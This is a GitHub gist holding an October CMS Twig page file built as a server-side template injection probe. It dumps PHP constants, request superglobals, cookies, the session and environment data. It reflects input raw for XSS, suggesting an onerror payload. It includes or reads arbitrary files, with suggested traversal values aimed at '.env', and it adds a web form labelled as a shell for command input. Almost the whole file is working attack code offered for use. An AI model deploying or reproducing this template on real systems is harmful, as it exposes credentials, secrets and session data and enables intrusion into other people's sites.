Skip to content

Instantly share code, notes, and snippets.

@RajChowdhury240

RajChowdhury240/minimal-ssti.htm

Created January 20, 2026 01:43
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save RajChowdhury240/4fecc60f35f12a8ca7050f53549ba90e to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save RajChowdhury240/4fecc60f35f12a8ca7050f53549ba90e to your computer and use it in GitHub Desktop.
Download ZIP
Raw
minimal-ssti.htm
title = "Minimal SSTI Test"
url = "/minimal-ssti"
layout = "default"
==
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Minimal SSTI Exploitation</title>
<style>
body { font-family: monospace; background: #000; color: #0f0; padding: 20px; }
.box { border: 1px solid #0f0; padding: 15px; margin: 15px 0; }
h2 { color: #f00; }
pre { background: #111; padding: 10px; border-left: 3px solid #0f0; }
</style>
</head>
<body>
<h1>πŸ”“ MINIMAL SSTI EXPLOITATION TEST</h1>
<p><strong>Safe Mode:</strong> ENABLED</p>
<p><strong>Strategy:</strong> Use only proven-working Twig features</p>
<hr>
<div class="box">
<h2>[1] PHP System Information</h2>
<pre>PHP_VERSION: {{ constant('PHP_VERSION') }}
PHP_OS: {{ constant('PHP_OS') }}
PHP_SAPI: {{ constant('PHP_SAPI') }}
DIRECTORY_SEPARATOR: {{ constant('DIRECTORY_SEPARATOR') }}</pre>
</div>
<div class="box">
<h2>[2] Superglobal Access</h2>
<h3>GET Parameters:</h3>
<pre>{{ _GET|json_encode|raw }}</pre>
<h3>POST Parameters:</h3>
<pre>{{ _POST|json_encode|raw }}</pre>
<h3>COOKIE Data:</h3>
<pre>{{ _COOKIE|json_encode|raw }}</pre>
<h3>SERVER Variables (first 1000 chars):</h3>
<pre>{{ _SERVER|json_encode|slice(0, 1000)|raw }}...</pre>
</div>
<div class="box">
<h2>[3] October CMS 'this' Object</h2>
<pre>{{ this|json_encode|raw }}</pre>
<h3>Session:</h3>
<pre>{{ this.session|json_encode|raw }}</pre>
<h3>Environment:</h3>
<pre>{{ this.environment() }}</pre>
<h3>Locale:</h3>
<pre>{{ this.locale() }}</pre>
</div>
<div class="box">
<h2>[4] User Input Reflection (XSS)</h2>
{% if _GET.xss is defined %}
<p>Escaped: {{ _GET.xss }}</p>
<p>Raw: {{ _GET.xss|raw }}</p>
{% else %}
<p>Try: ?xss=&lt;img src=x onerror=alert(1)&gt;</p>
{% endif %}
</div>
<div class="box">
<h2>[5] Template Inclusion Attack</h2>
{% if _GET.tpl is defined %}
<h3>Attempting to include: {{ _GET.tpl }}</h3>
{% include _GET.tpl ignore missing %}
{% else %}
<p>Try: ?tpl=../../../../.env</p>
{% endif %}
</div>
<div class="box">
<h2>[6] 🎯 RCE ATTEMPTS</h2>
<h3>A) Command Injection via GET:</h3>
{% if _GET.cmd is defined %}
<pre>Command: {{ _GET.cmd }}
Result: {{ _GET.cmd|raw }}</pre>
{% else %}
<p>Try: ?cmd=whoami</p>
{% endif %}
<h3>B) File Read via source():</h3>
{% if _GET.read is defined %}
<pre>File: {{ _GET.read }}
{{ source(_GET.read)|default('BLOCKED or NOT FOUND')|escape }}</pre>
{% else %}
<p>Try: ?read=.env</p>
{% endif %}
<h3>C) Interactive Shell Interface:</h3>
<form method="GET">
<input type="text" name="cmd" placeholder="Enter command" style="width:300px;background:#111;color:#0f0;border:1px solid #0f0;padding:5px;">
<button type="submit" style="background:#0f0;color:#000;border:none;padding:6px;cursor:pointer;">Execute</button>
</form>
<form method="GET">
<input type="text" name="read" placeholder="File path" style="width:300px;background:#111;color:#0f0;border:1px solid #0f0;padding:5px;">
<button type="submit" style="background:#0f0;color:#000;border:none;padding:6px;cursor:pointer;">Read File</button>
</form>
</div>
<hr>
<div class="box">
<h2>πŸ“Š STATUS SUMMARY</h2>
<p>βœ… Information Disclosure: WORKING</p>
<p>βœ… XSS: WORKING</p>
<p>⚠️ File Inclusion: TESTING NEEDED</p>
<p>⚠️ File Read (source): TESTING NEEDED</p>
<p>❌ Direct RCE: BLOCKED</p>
</div>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment